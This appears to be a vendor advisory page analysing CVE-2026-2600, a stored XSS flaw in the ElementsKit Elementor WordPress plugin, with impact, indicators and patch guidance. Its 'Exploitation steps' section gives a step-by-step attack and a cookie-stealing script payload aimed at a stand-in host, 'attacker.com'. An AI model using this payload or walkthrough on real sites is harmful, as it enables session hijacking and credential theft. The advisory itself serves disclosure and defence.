CVE-2026-2600
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-2600 is a Stored Cross-Site Scripting (XSS) vulnerability in the ElementsKit Elementor Addons and Templates plugin for WordPress, affecting all versions up to and including 3.7.9. The flaw exists in the ekit_tab_title parameter of the Simple Tab widget due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on April 4, 2026, with a patch available in version 3.8.0 and later. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerability arises because the ekit_tab_title parameter in the Simple Tab widget does not properly sanitize or escape user-supplied input before rendering it in the page output. An authenticated attacker with at minimum contributor-level access can craft a malicious payload in the tab title field, which is then persistently stored and executed in the browser of any user who visits the affected page. The specific code change addressing the flaw is visible in the plugin's SVN changeset (WordPress Trac, GitHub Advisory).

Impact

Successful exploitation allows authenticated attackers with contributor-level access or above to persistently inject arbitrary JavaScript into WordPress pages, affecting all site visitors who load the compromised content. The injected scripts execute in the context of the victim's browser session, enabling session hijacking, credential theft, malicious redirects, or defacement. While availability is not directly impacted, the confidentiality and integrity of user data and site content are at risk, and the persistent nature of stored XSS means the payload continues to execute until removed (GitHub Advisory, Wordfence).

Exploitability

A public proof-of-concept (PoC) repository was published on GitHub approximately two weeks after initial disclosure (GitHub PoC). As of the time of reporting, there is no confirmed evidence of active in-the-wild exploitation, and the vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.01% (2nd percentile), indicating a low near-term exploitation probability. Exploitation requires only contributor-level authentication, which lowers the barrier for abuse on sites with open or loosely managed contributor accounts (GitHub Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the ElementsKit Elementor Addons plugin at version 3.7.9 or earlier using tools like WPScan or by inspecting plugin metadata in page source.
  2. Obtain contributor access: Register or compromise an account with at least contributor-level privileges on the target WordPress site.
  3. Navigate to the Simple Tab widget: In the WordPress editor (Elementor), add or edit a page containing the Simple Tab widget from ElementsKit.
  4. Inject malicious payload: In the ekit_tab_title parameter field, enter a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.
  5. Publish the page: Save and publish the page, causing the malicious script to be stored in the database.
  6. Trigger execution: Any user (including administrators) who visits the affected page will have the injected script execute in their browser, enabling session hijacking, credential theft, or further attacks (GitHub Advisory, GitHub PoC).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to Elementor page-save endpoints from contributor-level accounts containing script tags or encoded JavaScript in the ekit_tab_title field; unusual page edits by low-privileged users.
  • File System / Database: WordPress database entries in wp_posts or wp_postmeta containing <script>, javascript:, or event handler attributes (e.g., onerror=, onload=) within tab title fields of ElementsKit widgets.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after loading pages with ElementsKit Simple Tab widgets; unexpected redirects or data exfiltration traffic originating from affected pages.
  • Process/Behavior: Unexpected JavaScript execution in browser developer console when visiting pages using the Simple Tab widget; browser security warnings triggered on affected pages (Wordfence).

Mitigation and workarounds

Update the ElementsKit Elementor Addons and Templates plugin to version 3.8.0 or later, which contains the fix for improper output escaping in the Simple Tab widget (WordPress Trac). For sites unable to patch immediately, restrict contributor-level access to trusted users only and audit existing pages for injected malicious scripts in tab title fields. A web application firewall (WAF) with XSS filtering rules can provide an additional layer of defense while patching is pending (Wordfence, GitHub Advisory).

Community reactions

Sucuri included CVE-2026-2600 in their April 2026 vulnerability patch roundup, highlighting it as part of a broader set of WordPress plugin issues requiring attention (Sucuri Blog). Wordfence, the assigning CNA, published a threat intelligence entry with remediation guidance shortly after disclosure. General community reaction has been routine for a medium-severity stored XSS in a popular WordPress plugin, with no significant controversy or widespread alarm noted.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-92541HIGH7.2
  • import-users-from-csv-with-meta
NoYesSep 20, 2026
CVE-2026-92540HIGH7.2
  • import-users-from-csv-with-meta
NoYesSep 20, 2026
CVE-2026-86785MEDIUM5.3
  • woo-to-facebook-shop
NoNoSep 20, 2026
CVE-2026-92965LOW3.7
  • tiktok-for-business
NoYesSep 20, 2026
CVE-2026-92423LOW2.7
  • meow-gallery
NoYesSep 20, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management